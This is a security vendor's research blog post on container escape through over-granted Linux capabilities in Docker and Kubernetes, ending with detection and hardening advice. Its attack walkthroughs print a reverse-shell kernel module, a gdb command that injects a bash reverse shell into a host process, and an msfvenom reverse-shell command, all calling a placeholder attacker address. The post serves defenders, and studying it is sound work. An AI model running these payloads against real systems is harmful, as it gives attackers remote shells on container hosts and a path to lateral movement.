Cybereason Blog | Cybersecurity News and Analysis

Container Escape: All You Need is Cap (Capabilities)

Written by Cybereason Team | Oct 5, 2022 2:27:36 PM

Until a few years ago, most cyberattacks focused mainly around the endpoint. However, new technologies like IoT devices, mobile, and cloud have transformed the entire tech industry – and the way attacks are carried out

Containers are now used by virtually all enterprises for day-to-day operations, making them a prime target for attackers. As a result, the number of cyberattacks involving containers has significantly increased, and security researchers and blue teams must be familiar with this field.  

The container attack surface is slightly different from the endpoint security surface. Some attacks take place within the container, and these attacks can occur for various reasons. Attackers may be able to use a Docker runtime exploit or a vulnerable container setup that’s caused by a container's misconfiguration.

In other circumstances, the attackers want to expand their attacks and move to other assets in the victim's network, and to do so, they can break out of the container. Breaking out from the container is also known as "container escape," which is considered the Holy Grail of the container security attack world. It allows an attacker to escape from a container to the underlying host. By doing so, the attacker can move laterally to other containers from the host or perform actions on the host itself. 

VM Escaping

We must dive into internal container principles to truly understand the concept of containers and the specific attack vectors. The first step is to recognize that most containers are not virtual machines (VMs) but, rather, techniques of restricting processes on a machine using various isolation mechanisms. The primary distinction between a virtual machine and a container is that a VM has its own virtualized kernel, whereas the container utilizes the host kernel:

Difference between virtual machines and containers

There are many ways to manage containers. Here, we will focus on Docker runtime and Kubernetes container orchestration platforms. Container orchestration solutions like Kubernetes are often used because managing containers at scale necessitates the use of an automated platform.

In this post, and the upcoming ones, we will explain how adversaries can abuse some container isolation mechanisms to perform container escape and how we can reduce the risk from this kind of attack. 

We will explore one of the leading Linux isolation mechanisms applied to containers – capabilities –and learn how malicious actors can take advantage of them to break out from containers.

What are Capabilities?

Capabilities provide the ability to give a specific set of privileges to a thread/process. They do so by breaking down the dichotomy between privileged and unprivileged that embodies "all or nothing" into logical groups of privileges. All privileged actions have been thought out and categorized into a set of approximately 40 capabilities. 

That means that a process/thread can use a small set of actions for only those that are needed, lowering the danger of abuse to unexpected behaviors. In other words, the purpose of capabilities is to divide root privilege into distinct privileges. Capabilities can be applied to container processes; in this way, all processes part of that container can inherit its capabilities.

When a capability is assigned to a container, the caller thread can launch a set of system calls associated with the capability. That means that having a particular capability allows it to execute specific system calls related to it:

Root privileges breakdown into capabilities and system calls 

Most capabilities are atomic units with a constrained number of system calls. Still, some of them are overloaded, such as the SYS ADMIN capability, which is frequently referred to as the "new root" CAP_PERFMON, CAP_BPF, and CAP_RESTORE_CHECKPOINT are just a few of the capabilities that are included in SYS_ADMIN.

The SYS_ADMIN capability also enables us to carry out a wide range of privileged file system operations and system administration tasks, such as quotactl(2), mount(2), and umount(2). A complete list of capabilities is maintained here.

In our examples, we will utilize the built-in features of container runtimes to control the container's capabilities. Container runtimes are in charge of loading container images from a repository, keeping track of local system resources, utilizing Linux features such as capabilities to be used by a container, and managing the lifespan of containers in a containerized architecture. 

Here are examples of commands that can be used with the Docker runtime:

  • Add a new capability to the container

 docker run --cap-add=<CAP> -it <Image_Name>

  • Add all the capabilities to the container

 docker run --cap-add ALL -it <Image_Name>

  • Drop an existing capability from the container

 docker run --cap-drop=<CAP> -it <Image_Name>

  • Drop all the capabilities from the container

 docker run --cap-drop ALL -it <Image_Name>

In Kubernetes, you can add or drop capabilities in the SecurityContext field of a Container:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  containers:
  - name: ubuntu-container
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_MODULE
        drop:
        - CHOWN

Adding or dropping capabilities

By default, Docker runtimes start the containers with a limited set of capabilities:

cap_chown, cap_dac_override, cap_fowner, cap_fsetid, cap_kill, cap_setgid, cap_setuid, cap_setpcap, cap_net_bind_service, cap_net_raw, cap_sys_chroot, cap_mknod, cap_audit_write, cap_setfcap

Default capabilities in Docker container V20.10.7

It is worth noting that we may execute a container with the --privileged flag, which grants the container all of the capabilities and removes isolation mechanisms. It is the same as executing a process with root privileges on the host machine. Therefore, we can replace the capability addition parts with this flag.

To run a privileged container in Docker runtime:

docker run --privileged -it <image_name>

 

To run a privileged container in Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: privileged-container
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
    privileged: true

 

Capabilities Discovery

Once we are in the container, we can perform capability discovery to determine which privileges are allowed in the container. The container capabilities can be viewed by reading the content of the main container process (PID = 1) status from within the container: 

root@2416b7f009ee:/proc# grep Cap /proc/1/status
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

Capabilities discovery

The capabilities are displayed as bitmasks, and each bit in the bitmask represents a different capability. The capability map can be found in this kernel header. We can use this map to decode the bitmask and find out which container capabilities have been configured.

The most popular tool to discover and debug capabilities is capsh. However, it is not available by default and needs to be installed on the machine. Using the capsh tool, we can decode the bitmask by executing capsh --decode=CAP BITMASK:

attacker@ubuntu:~$ capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

Decoding with capsh

As we mentioned earlier, capsh is not available by default, if installed we can use it in the victim container to discover the capabilities by running capsh --print:

root@2416b7f009ee:/home# capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

Ambient set =

Securebits: 00/0x0/1'b0

 secure-noroot: no (unlocked)

 secure-no-suid-fixup: no (unlocked)

 secure-keep-caps: no (unlocked)

 secure-no-ambient-raise: no (unlocked)

uid=0(root) euid=0(root)

gid=0(root)

Capabilities discovery using capsh

So, now that we’ve covered container capabilities, it's time to see how we can take advantage of them to perform a container escape. There are many ways to abuse container capabilities; here, we'll focus on three: 

  • Container escape via a Kernel module
  • Container escape via process debugging using gdb
  • Container escape via shellcode injection using a custom injector

Container Escape via a Kernel Module

In this scenario, we will show how to abuse containers with SYS_MODULE capability, which allows installing and removing kernel modules. In the following scenarios, we will list the minimum required capabilities, which can also be achieved using the '--privileged' flag as explained earlier. The minimal requirement to perform this attack is that the container must be started with SYS_MODULE capability.

Here are examples of how to add this capability using Docker and Kubernetes:

Docker:

docker run --cap-add=SYS_MODULE -it ubuntu bash


Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  containers:
  - name: container-escape-via-kernel-module
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_MODULE

 

The next step starts when the attacker achieves initial access to the container and finds out that the SYS_MODULE capability is present. Then the attacker needs to deliver the malicious module to a container. 

One way is by uploading a module already compiled on the attacker's machine. Since there are many variations between kernel versions, and some modules might not function on a different version, this option can be problematic. 

Another option is to create a new kernel module on the compromised container, which we'll demonstrate. In order to create a new kernel module that executes a reverse shell, we relied on an open source code from GitHub and configured it to fit our purpose:

#include<linux/init.h>
#include<linux/module.h>
#include<linux/kmod.h>

MODULE_LICENSE("GPL");

static int start_shell(void){
char *argv[] ={"/bin/bash","-c","bash -i >& /dev/tcp/<ATTACKER_IP>/<LISTENER_PORT> 0>&1", NULL};
static char *env[] = {
"HOME=/",
"TERM=linux",
"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC);
}

static int init_mod(void){
return start_shell();
}

static void exit_mod(void){
return;
}
module_init(init_mod);
module_exit(exit_mod);

 

Before compiling the module, the attacker must ensure that the victim kernel headers are installed on the machine. Now the attacker creates a Makefile on disk, which contains the compiling instructions:

obj-m +=revshell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

 

Then he or she runs the “make” command to compile and link the module according to the Makefile instructions. Finally, the attacker installs the kernel module, which provides the attacker kernel-level persistence:

insmod revshell.ko

 

Container escape via kernel module

Once we install the module, a reverse shell session will be created on the attacker machine from the container's host:

Container escape via Kernel Module installation as seen in the Cybereason Defense Platform

Container Escape via SYS_PTRACE

In this scenario, we will show how to abuse containers with SYS_PTRACE capability, which allows the use of ptrace(). This system call allows a process to monitor and control the execution of another process. 

To perform this attack, the container must be started with the option --pid=host, which enables the sharing of the PID address space between the container and the host operating system, allowing the container process to see every other process running on the host. 

We will demonstrate how to pull this off using two techniques:

Process Debugging

For this technique, we will use gdb to attach to an already running process and call the system function to run the reverse shell.

The minimal requirement to perform this type of attack is to grant SYS_PTRACE and SYS_ADMIN capabilities to the container and have an AppArmor profile (Linux kernel security module, which restricts some system calls within the container) with either:

  • allow ptrace()
  • Unconfined

Here are examples of how to add this capability using Docker and Kubernetes (by default, seccomp policy in Kubernetes is Unconfined.)

Docker:

docker run --security-opt=apparmor:unconfined --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN--pid=host -it ubuntu bash

 

Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: container-escape-via-ptrace
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_PTRACE
        - SYS_ADMIN

 

Firstly, we need to make sure that gdb is installed on the container. If not, we might need to install it:

apt-get update
apt-get install gdb

 

After that, we will list the currently operating processes in order to determine a target process to debug:

ps -ef
or
ls /proc
or
pidof <processname>

 

Now we can attach our debugger to the running process and make it call a system function that will execute a bash reverse shell:

gdb -p PID
call (void)system("bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'")

 

At this point, the process will spawn a child process of bash, which will execute a reverse shell to the attacker machine:

Container escape via process debugging 

Container escape via process injection as seen in the Cybereason Defense Platform

Shellcode Injection

For this technique, we will use a custom-made injector to attach to an already running process and call and inject a shellcode.

The minimal requirements to perform this type of attack is to grant SYS_PTRACE capability and have AppArmor profile with either:

  • allow ptrace()
  • Unconfined

Here are examples of how to add this capability using Docker and Kubernetes (By default Seccomp policy in Kubernetes is Unconfined).

Docker:

docker run --security-opt=apparmor:unconfined --cap-add=SYS_PTRACE --pid=host -it ubuntu bash

 

Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: container-escape-via-injection
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_PTRACE

 

Firstly, we need to generate a reverse shellcode on the attacker machine using msfvenom:

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c

 

To perform this type of attack, we created a dedicated injector which relied on this code. Then we copied the shellcode we generated earlier to the code, compiled it, and delivered it to the target machine.

The next step is to list the currently operating processes to determine a target process for the injection:

ps -ef
or
ls /proc
or
pidof <processname>.

 

Then we will execute the injector with the PID we chose in the previous step:

At this point, the attacker receives a reverse shell from the underlying host:

Container escape via shellcode injection 

Container escape via process injection as seen in the Cybereason Defense Platform

Detection

Cybereason Cloud Workflow Protection (CWPP) detects container escape, including in the scenarios we have outlined, by relying on behavioral analysis and machine learning. Cybereason collects data from multiple containers, pods, endpoints, and servers in real-time and uses an in-memory graph to cross-correlate this data to discover malicious activity. 

Instead of using signatures that can be easily changed, Cybereason looks for attack behavior:

Container Escapes as seen in the Cybereason Defense Platform

Best Practices

It is very common for containers to be configured by design with the capabilities that were mentioned above. Moreover, these capabilities are being used for many legitimate activities. Therefore, it is important to verify that every capability that is being configured to the container is truly necessary. 

Here are some things that can be done to reduce the risk of container escape via capabilities:

  • When creating a new container, first drop all the capabilities, and – only after that – add the relevant ones for the purpose of the container.
  • Minimize the use of privileged containers. This can be done by running the container as a user and not as a root. Moreover, you can disable privilege escalation with the AllowPrivilegeEscalation flag (always true when the container is run as privileged or has CAP_SYS_ADMIN capability), or use the docker command line option:
    •  --security-opt=no-new-privileges
  • Try to avoid the use of the CAP_SYS_ADMIN capability.
  • Use seccomp filter for blocking specific malicious syscalls per capabilities. For example, for SYS_MODULE, you can define that you won’t be able to install a new module.
  • Apply an AppArmor profile that will block the relevant capabilities of specific programs.

You can now see how easily attackers can leverage misconfigurations in containers for escaping to the host and taking control of it, accessing sensitive data, or moving laterally across the network. In the next post, we will dive into another container's isolation mechanism and learn how we can perform container escape using it.

About the Authors

Eran Ayalon, Security Researcher on the Cybereason Security Research Team

Eran Ayalon specializes in detecting different attack frameworks on multiple OS. Eran started his career six years ago as a security researcher in the Israeli Air Force, where he specialized in malware analysis, forensics, and incident response. Eran's previous employment was in the banking sector, where he led threat hunting and incident response in corporate environments.

Ilan Sokol, Security Researcher on the Cybereason Security Research Team

Ilan Sokol specializes in Linux research. Before Cybereason, his work focused on research in the offensive security field. As a result, Ilan deeply understands the malicious operations prevalent in the current threat landscape. He is passionate about reverse engineering and malware analysis but is also interested in offensive aspects such as vulnerability research.

This research would not have been possible without the tireless effort and help of Oren Ofer, Principal Security Researcher.